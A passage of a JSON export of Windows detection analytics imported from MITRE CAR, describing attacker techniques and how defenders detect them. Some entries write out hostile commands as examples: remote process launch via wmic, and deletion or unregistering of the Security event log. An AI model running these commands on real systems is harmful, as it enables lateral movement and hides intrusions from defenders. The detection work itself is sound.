functionality.\n\nWhen a client remotely communicates with the Service Control Manager, there are two observable behaviors. First, the client connects to the [RPC Endpoint Mapper](../CAR-2014-05-001) over 135/tcp. This handles authentication, and tells the client what port the endpoint\u2014in this case the SCM\u2014is listening on. Then, the client connects directly to the listening port on `services.exe`. 
If the request is to start an existing service with a known command line, the SCM process will run the corresponding command.
Windows uses RunDll32 legitimately in its normal operation, but with a proper baseline and understanding of the environment, monitoring its usage could be fruitful.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2014-03-006.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2014-03-006", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2014-03-006.yaml" } }, { "id": "mitre-car-car-2014-04-003", "type": "detection", "name": "Powershell Execution", "description": "[PowerShell](https://attack.mitre.org/techniques/T1059/001/) is a scripting environment included with Windows that is used by both attackers and administrators. Execution of PowerShell scripts in most Windows versions is opaque and not typically secured by antivirus which makes using PowerShell an easy way to circumvent security measures. 
This analytic detects execution of PowerShell scripts.\n\nPowershell can be used to hide monitored command line execution such as:\n- `net use`\n- `sc start`", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2014-04-003.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2014-04-003", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2014-04-003.yaml" } }, { "id": "mitre-car-car-2014-05-001", "type": "detection", "name": "RPC Activity", "description": "Microsoft Windows uses its implementation of [Distributed Computing Environment/Remote Procedure Call](https://en.wikipedia.org/wiki/DCE/RPC) (DCE/RPC), which it calls [Microsoft RPC](https://en.wikipedia.org/wiki/Microsoft_RPC), to call certain APIs remotely.\n\nA Remote Procedure Call is initiated by communicating to the RPC Endpoint Mapper, which exists as the Windows service RpcEptMapper and listens on the port 135/tcp. The endpoint mapper resolves a requested endpoint/interface and responds to the client with the port that the service is listening on. Since the RPC endpoints are assigned ports when the services start, these ports are dynamically assigned from 49152 to 65535. The connection to the endpoint mapper then terminates and the client program can communicate directly with the requested service.\n\nRPC is a legitimate functionality of Windows that allows remote interaction with a variety of services. For a Windows environment to be properly configured, several programs use RPC to communicate legitimately with servers. 
The background and benign RPC activity may be enormous, but must be learned, especially peer-to-peer RPC between workstations, which is often indicative of [Lateral Movement](https://attack.mitre.org/tactics/TA0008).\n\nAccording to ATT&CK, adversaries frequently use RPC connections to remotely\n\n- [Create/modify](https://attack.mitre.org/techniques/T1543/003) and [execute](https://attack.mitre.org/techniques/T1569/002) services ([CAR-2014-03-005](CAR-2014-03-005))\n- [Schedule Tasks](https://attack.mitre.org/techniques/T1053) ([CAR-2015-04-002](../CAR-2015-04-002))\n- Query ([CAR-2014-11-007](../CAR-2014-11-007)) and Invoke ([CAR-2014-12-001](../CAR-2014-12-001)) - [Windows Management Instrumentation (WMI)](https://attack.mitre.org/techniques/T1047)\n\nAdditional endpoints are detailed at [here](http://www.hsc.fr/ressources/articles/win_net_srv/well_known_named_pipes.html).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1021" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2014-05-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2014-05-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2014-05-001.yaml" } }, { "id": "mitre-car-car-2014-05-002", "type": "detection", "name": "Services launching Cmd", "description": "Windows runs the [Service Control Manager](https://en.wikipedia.org/wiki/Service_Control_Manager) (SCM) within the process `services.exe`. Windows launches services as independent processes or DLL loads within a [svchost.exe](https://en.wikipedia.org/wiki/svchost.exe) group. 
To be a legitimate service, a process (or DLL) must have the appropriate service entry point [SvcMain](https://msdn.microsoft.com/en-us/library/windows/desktop/ms687414.aspx). If an application does not have the entry point, then it will timeout (default is 30 seconds) and the process will be killed.\n\nTo survive the timeout, [adversaries and red teams](https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf) can create services that direct to `cmd.exe` with the flag `/c`, followed by the desired command. The `/c` flag causes the command shell to run a command and immediately exit. As a result, the desired program will remain running and it will report an error starting the service. This analytic will catch that command prompt instance that is used to launch the actual malicious executable. Additionally, the children and descendants of services.exe will run as a SYSTEM user by default. Thus, services are a convenient way for an adversary to gain [Persistence](https://attack.mitre.org/tactics/TA0003) and [Privilege Escalation](https://attack.mitre.org/tactics/TA0004).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1543" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2014-05-002.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2014-05-002", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2014-05-002.yaml" } }, { "id": "mitre-car-car-2014-07-001", "type": "detection", "name": "Service Search Path Interception", "description": "According to [ATT&CK](https://attack.mitre.org/), an adversary may [escalate 
privileges](https://attack.mitre.org/tactics/TA0004) by [intercepting the search path](https://attack.mitre.org/techniques/T1574/009) for legitimately installed services.
A command prompt being launched from a process that normally doesn\u2019t launch command prompts could be the result of malicious code being injected into that process, or of an attacker replacing a legitimate program with a malicious one.\n\n\n### Output Description\n\nThe time and host the new process was started as well as its parent", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2014-11-002.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2014-11-002", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2014-11-002.yaml" } }, { "id": "mitre-car-car-2014-11-003", "type": "detection", "name": "Debuggers for Accessibility Applications", "description": "The Windows Registry location `HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options` allows for parameters to be set for applications during execution. One feature used by malicious actors is the \"Debugger\" option. When a key has this value enabled, a Debugging command line can be specified. Windows will launch the Debugging command line, and pass the original command line in as an argument. Adversaries can set a Debugger for [Accessibility Applications](https://attack.mitre.org/techniques/T1546/008). The analytic looks for the original command line as an argument to the Debugger. 
When the strings \"sethc.exe\", \"utilman.exe\", \"osk.exe\", \"narrator.exe\", and \"Magnify.exe\" are detected in the arguments, but not as the main executable, it is very likely that a Debugger is set.\n\nThis analytic could depend on the possibility of the known strings used as arguments for other applications used in the day-to-day environment. Although the chance of the string \"sethc.exe\" being used as an argument for another application is unlikely, it still is a possibility.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1546" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2014-11-003.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2014-11-003", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2014-11-003.yaml" } }, { "id": "mitre-car-car-2014-11-004", "type": "detection", "name": "Remote PowerShell Sessions", "description": "According to [ATT&CK](https://attack.mitre.org/), [PowerShell](https://attack.mitre.org/techniques/T1059/001) can be used over WinRM to remotely run commands on a host. When a remote PowerShell session starts, svchost.exe executes wsmprovhost.exe\n\nFor this to work, certain registry keys must be set, and the WinRM service must be enabled. 
The PowerShell command `Enter-PSSession -ComputerName \\` creates a remote PowerShell session.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1059", "T1021" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2014-11-004.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2014-11-004", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2014-11-004.yaml" } }, { "id": "mitre-car-car-2014-11-005", "type": "detection", "name": "Remote Registry", "description": "An adversary can remotely [manipulate the registry](https://attack.mitre.org/techniques/T1112) of another machine if the RemoteRegistry service is enabled and valid credentials are obtained. While the registry is remotely accessed, it can be used to prepare a [Lateral Movement](https://attack.mitre.org/tactics/TA0008) technique, [discover](https://attack.mitre.org/tactics/TA0007) the configuration of a host, achieve [Persistence](https://attack.mitre.org/tactics/TA0003), or anything that aids an adversary in achieving the mission. Like most ATT&CK techniques, this behavior can be used legitimately, and the reliability of an analytic depends on the proper identification of the pre-existing legitimate behaviors. 
Although this behavior is disabled in many Windows configurations, it is possible to [remotely enable](https://attack.mitre.org/techniques/T1569/002) the RemoteRegistry service, which can be detected with [CAR-2014-03-005](../CAR-2014-03-005).\n\nRemote access to the registry can be achieved via\n\n- Windows API function [RegConnectRegistry](https://msdn.microsoft.com/en-us/library/windows/desktop/ms724840.aspx)\n- command line via `reg.exe`\n- graphically via `regedit.exe`\n\nAll of these behaviors call into the Windows API, which uses the NamedPipe `WINREG` over SMB to handle the protocol information. This network can be decoded with wireshark or a similar sensor, and can also be detected by hooking the API function.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2014-11-005.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2014-11-005", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2014-11-005.yaml" } }, { "id": "mitre-car-car-2014-11-006", "type": "detection", "name": "Windows Remote Management (WinRM)", "description": "When a [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) connection is opened, the client sends HTTP requests to port 5985 for HTTP or 5986 for HTTPS on the target host. Each HTTP(S) request to the URI \"/wsman\" is called, and other information is set in the headers. Depending on the operation, the HTTP method may vary (i.e., GET, POST, etc.). This analytic would detect Remote PowerShell, as well as other communications that rely on WinRM. 
Additionally, it outputs the executable on the client host, the connection information, and the hostname of the target host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1021" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2014-11-006.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2014-11-006", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2014-11-006.yaml" } }, { "id": "mitre-car-car-2014-11-007", "type": "detection", "name": "Remote Windows Management Instrumentation (WMI) over RPC", "description": "As described in ATT&CK, an adversary can use [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) (WMI) to view or manipulate objects on a remote host. It can be used to remotely edit configuration, start services, query files, and anything that can be done with a WMI class. When remote WMI requests are over RPC ([CAR-2014-05-001](../CAR-2014-05-001)), it connects to a DCOM interface within the RPC group netsvcs. To detect this activity, a sensor is needed at the network level that can decode RPC traffic or on the host where the communication can be detected more natively, such as [Event Tracing for Windows](https://msdn.microsoft.com/en-us/library/windows/desktop/bb968803.aspx). Using wireshark/tshark decoders, the WMI interfaces can be extracted so that WMI activity over RPC can be detected.\n\nAlthough the description details how to detect remote WMI precisely, a decent estimate has been to look for the string RPCSS within the initial RPC connection on 135/tcp. 
It returns a superset of this activity, and will trigger on all DCOM-related services running within RPC, which is likely to also be activity that should be detected between hosts.\nMore about RPCSS at : [rpcss_dcom_interfaces.html](http://www.hsc.fr/ressources/articles/win_net_srv/rpcss_dcom_interfaces.html)\n\n### Output Description\n\nIdentifies the connection in which WMI traffic is seen, as well as the process(es) responsible for owning the connection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2014-11-007.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2014-11-007", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2014-11-007.yaml" } }, { "id": "mitre-car-car-2014-11-008", "type": "detection", "name": "Command Launched from WinLogon", "description": "An adversary can use [accessibility features](https://attack.mitre.org/techniques/T1546/008) (Ease of Access), such as StickyKeys or Utilman, to launch a command shell from the logon screen and gain SYSTEM access. Since an adversary does not have physical access to the machine, this technique must be run within [Remote Desktop](https://attack.mitre.org/techniques/T1021/001). To prevent an adversary from getting to the login screen without first authenticating, Network-Level Authentication (NLA) must be enabled. If a debugger is set up for one of the accessibility features, then it will intercept the process launch of the feature and instead execute a new command line. 
This analytic looks for instances of `cmd.exe` or `powershell.exe` launched directly from the logon process, `winlogon.exe`. It should be used in tandem with [CAR-2014-11-003](../CAR-2014-11-003), which detects the accessibility programs in the command line.\n\nSeveral accessibility programs can be run using the Ease of Access center\n\n- `sethc.exe` handles StickyKeys\n- `utilman.exe` is the Ease of Access menu\n- `osk.exe` runs the On-Screen Keyboard\n- `narrator.exe` reads screen text over audio\n- `magnify.exe` magnifies the view of the screen near the cursor", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1546" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2014-11-008.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2014-11-008", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2014-11-008.yaml" } }, { "id": "mitre-car-car-2014-12-001", "type": "detection", "name": "Remotely Launched Executables via WMI", "description": "Adversaries can use [Windows Management Instrumentation (WMI)](https://attack.mitre.org/techniques/T1047) to move laterally by launching executables remotely. For adversaries to achieve this, they must open a WMI connection to a remote host. This RPC activity is currently detected by [CAR-2014-11-007](../CAR-2014-11-007). After the WMI connection has been initialized, a process can be remotely launched using the command: `wmic /node:\"\" process call create \"\"`, which is detected via [CAR-2016-03-002](../CAR-2016-03-002).\n\nThis leaves artifacts at both a network (RPC) and process (command line) level. 
When wmic.exe (or the schtasks API) is used to remotely create processes, Windows uses RPC (135/tcp) to communicate with the remote machine.\n\nAfter RPC authenticates, the RPC endpoint mapper opens a high port connection, through which the schtasks Remote Procedure Call is actually implemented. With the right packet decoders, or by looking for certain byte streams in raw data, these functions can be identified.\n\nWhen the command line is executed, it has the parent process of `C:\\windows\\system32\\wbem\\WmiPrvSE.exe`. This analytic looks for these two events happening in sequence, so that the network connection and target process are output.\n\nCertain strings can be identifiers of the WMI by looking up the interface UUID for IRemUnknown2 in different formats\n\n- UUID `00000143-0000-0000-c000-000000000046` (decoded)\n- Hex `43 01 00 00 00 00 00 00 c0 00 00 00 00 00 00 46` (raw)\n- ASCII `CF` (printable text only)\n\nThis identifier is present three times during the RPC request phase. 
Any sensor that has access to the byte code as raw, decoded, or ASCII could implement this analytic.\nThe transfer syntax is\n\n- UUID `8a885d04-1ceb-11c9-9fe8-08002b104860` (decoded)\n- Hex `04 5d 88 8a eb 1c c9 11 9f e8 08 00 2b 10 48 60` (raw)\n- ASCII \\`]+H\\`\\` (printable text only)\n\nThus, a great ASCII based signature is\n\n- `*CF*]+H*CF*CF*host*\"`\n\n### Output Description\n\nIdentifies the process that initiated the RPC request (such as wmic.exe or powershell.exe), as well as the source and destination information of the network connection that triggered the alert.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2014-12-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2014-12-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2014-12-001.yaml" } }, { "id": "mitre-car-car-2015-04-001", "type": "detection", "name": "Remotely Scheduled Tasks via AT", "description": "When AT.exe is used to remotely [schedule tasks](https://attack.mitre.org/techniques/T1053), Windows uses named pipes over [SMB](https://en.wikipedia.org/wiki/Server_Message_Block) to communicate with the API on the remote machine. After authentication over SMB, the Named Pipe \"ATSVC\" is opened, over which the JobAdd function is called. On the remote host, the job files are created by the Task Scheduler and follow the convention `C:\\Windows\\System32\\AT`. 
Unlike [CAR-2013-05-004](../CAR-2013-05-004), this analytic specifically focuses on uses of AT that can be detected between hosts, indicating remotely gained [execution](https://attack.mitre.org/tactics/TA0002).\n\nThis pipe activity could be discovered with a network decoder, such as that in wireshark, that can inspect SMB traffic to identify the use of pipes. It could also be detected by looking for raw packet capture streams or from a custom sensor on the host that hooks the appropriate API functions. If no network or API level of visibility is possible, this traffic may be inferred by looking at SMB connections over 445/tcp followed by the creation of files matching the pattern `C:\\Windows\\System32\\AT\\`.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1053" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2015-04-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2015-04-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2015-04-001.yaml" } }, { "id": "mitre-car-car-2015-04-002", "type": "detection", "name": "Remotely Scheduled Tasks via Schtasks", "description": "An adversary can [move laterally](https://attack.mitre.org/tactics/TA0008) using the `schtasks` command to remotely [schedule tasks/jobs](https://attack.mitre.org/techniques/T1053). Although these events can be detected with command line analytics [CAR-2013-08-001](../CAR-2013-08-001), it is possible for an adversary to use the API directly, via the Task Scheduler GUI or with a scripting language such as [PowerShell](https://attack.mitre.org/techniques/T1059/001). 
In these cases, an additional source of data becomes necessary to detect adversarial behavior. When scheduled tasks are created remotely, Windows uses RPC (135/tcp) to communicate with the Task Scheduler on the remote machine. Once an RPC connection is established ([CAR-2014-05-001](../CAR-2014-05-001)), the client communicates with the Scheduled Tasks endpoint, which runs within the service group netsvcs. With packet capture and the right packet decoders or byte-stream based signatures, remote invocations of these functions can be identified.\n\nCertain strings can be identifiers of the schtasks, by looking up the interface UUID of ITaskSchedulerService in different formats\n\n- UUID `86d35949-83c9-4044-b424-db363231fd0c` (decoded)\n- Hex `49 59 d3 86 c9 83 44 40 b4 24 db 36 32 31 fd 0c` (raw)\n- ASCII `IYD@$621` (printable bytes only)\n\nThis identifier is present three times during the RPC request phase. Any sensor that has access to the byte code as raw, decoded, or ASCII could implement this analytic.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1053" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2015-04-002.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2015-04-002", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2015-04-002.yaml" } }, { "id": "mitre-car-car-2015-07-001", "type": "detection", "name": "All Logins Since Last Boot", "description": "Once a credential dumper like [mimikatz](https://attack.mitre.org/software/S0002) runs, every user logged on since boot is potentially compromised, because the credentials were accessed via the memory of `lsass.exe`. 
When such an event occurs, this analytic will give the forensic context to identify compromised users. Those users could potentially be used in later events for additional logons.\n\nThe time field indicates the first and last time a system reported a user logged into a given system. This means that activity could be intermittent between the times given and should not be considered a duration.\n\n\n### Output Description\n\nA list of hostnames and the users that had been logged into the system at some point after the system's last restart.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2015-07-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2015-07-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2015-07-001.yaml" } }, { "id": "mitre-car-car-2016-03-001", "type": "detection", "name": "Host Discovery Commands", "description": "When entering on a host for the first time, an adversary may try to [discover](https://attack.mitre.org/tactics/TA0007) information about the host. There are several built-in Windows commands that can be used to learn about the software configurations, active users, administrators, and networking configuration. These commands should be monitored to identify when an adversary is learning information about the system and environment. 
The information returned may impact choices an adversary can make when [establishing persistence](https://attack.mitre.org/tactics/TA0003), [escalating privileges](https://attack.mitre.org/tactics/TA0004), or [moving laterally](https://attack.mitre.org/tactics/TA0008).\n\nBecause these commands are built in, they may be run frequently by power users or even by normal users. Thus, an analytic looking at this information should have well-defined white- or blacklists, and should consider looking at an anomaly detection approach, so that this information can be learned dynamically.\n\nWithin the built-in Windows Commands:\n\n- `hostname`\n- `ipconfig`\n- `net`\n- `quser`\n- `qwinsta`\n- `sc` with flags `query`, `queryex`, `qc`\n- `systeminfo`\n- `tasklist`\n- `dsquery`\n- `whoami`\n\n**Note** `dsquery` is only pre-existing on Windows servers.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1087", "T1069", "T1016", "T1082", "T1033", "T1057", "T1007" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2016-03-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2016-03-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2016-03-001.yaml" } }, { "id": "mitre-car-car-2016-03-002", "type": "detection", "name": "Create Remote Process via WMIC", "description": "Adversaries may use [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) (WMI) to move laterally, by launching executables remotely. The analytic [CAR-2014-12-001](../CAR-2014-12-001) describes how to detect these processes with network traffic monitoring and process monitoring on the target host. 
However, if the command line utility `wmic.exe` is used on the source host, then it can additionally be detected on an analytic. The command line on the source host is constructed into something like `wmic.exe /node:\"\\\" process call create \"\\\"`. It is possible to also connect via IP address, in which case the string `\"\\\"` would instead look like `IP Address`.\n\nAlthough this analytic was created after [CAR-2014-12-001](../CAR-2014-12-001), it is a much simpler (although more limited) approach. Processes can be created remotely via WMI in a few other ways, such as more direct API access or the built-in utility [PowerShell](https://attack.mitre.org/T1059/001).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2016-03-002.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2016-03-002", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2016-03-002.yaml" } }, { "id": "mitre-car-car-2016-04-002", "type": "detection", "name": "User Activity from Clearing Event Logs", "description": "It is unlikely that event log data would be cleared during normal operations, and it is likely that malicious attackers may try to cover their tracks by clearing an event log. When an event log gets cleared, it is suspicious. 1. This is often done using `wevtutil`, a legitimate tool provided by Microsoft. This action interferes with event collection and notification, and may lead to a security event going undetected, thereby potentially leading to further compromise of the network. 2. 
Alerting when a `Clear Event Log` is generated could point to this intruder technique. Centrally collecting events has the added benefit of making it much harder for attackers to cover their tracks. Event Forwarding permits sources to forward multiple copies of a collected event to multiple collectors, thus enabling redundant event collection. Using a redundant event collection model can minimize the single point of failure risk. 3. Attackers may set the option of the sources of events with `Limit-EventLog -LogName Security -OverflowAction DoNotOverwrite` to not delete old EventLog when the .evtx is full. By default the Security Log size is configured with the minimum value of 20 480KB (~23 000 EventLog). So if this option is enabled, all the new EventLogs will be automatically deleted. We can detect this behavior with the Security EventLog 1104. 4. Attackers may delete .evtx with `del C:\\Windows\\System32\\winevt\\logs\\Security.evtx` or `Remove-Item C:\\Windows\\System32\\winevt\\logs\\Security.evtx` after having disabled and stopped the Eventlog service. As the EventLog service is disabled and stopped, the .evtx files are no longer used by this service and can be deleted. The new EventLog will be Unavailable until the configuration is reset. 5. Attackers may use the powershell command `Remove-EventLog -LogName Security` to unregister source of events that are part of Windows (Application, Security\u2026). This command deletes the security EventLog (which also generates EventId 1102) but the new Eventlogs are still recorded until the system is rebooted. After the System is rebooted, the Security log is unregistered and doesn\u2019t log any new Eventlog. 
However logs generated between the command and the reboot are still available in the .evtx file.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2016-04-002.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2016-04-002", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2016-04-002.yaml" } }, { "id": "mitre-car-car-2016-04-003", "type": "detection", "name": "User Activity from Stopping Windows Defensive Services", "description": "Spyware and malware remain a serious problem and Microsoft developed security services, Windows Defender and Windows Firewall, to combat this threat. 
In the event Windows Defender or Windows Firewall is turned off, administrators should correct the issue immediately to prevent the possibility of infection or further infection and investigate to determine if caused by crash or user manipulation.\n\nStopping services events are Windows Event Code 7036.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2016-04-003.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2016-04-003", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2016-04-003.yaml" } }, { "id": "mitre-car-car-2016-04-004", "type": "detection", "name": "Successful Local Account Login", "description": "The successful use of [Pass The Hash](https://attack.mitre.org/techniques/T1550/002/) for lateral movement between workstations would trigger event ID 4624, with an event level of Information, from the security log. 
This behavior would be a LogonType of 3 using NTLM authentication where it is not a domain logon and not the ANONYMOUS LOGON account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1550" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2016-04-004.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2016-04-004", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2016-04-004.yaml" } }, { "id": "mitre-car-car-2016-04-005", "type": "detection", "name": "Remote Desktop Logon", "description": "A remote desktop logon, through [RDP](https://attack.mitre.org/techniques/T1021/001), may be typical of a system administrator or IT support, but only from select workstations. 
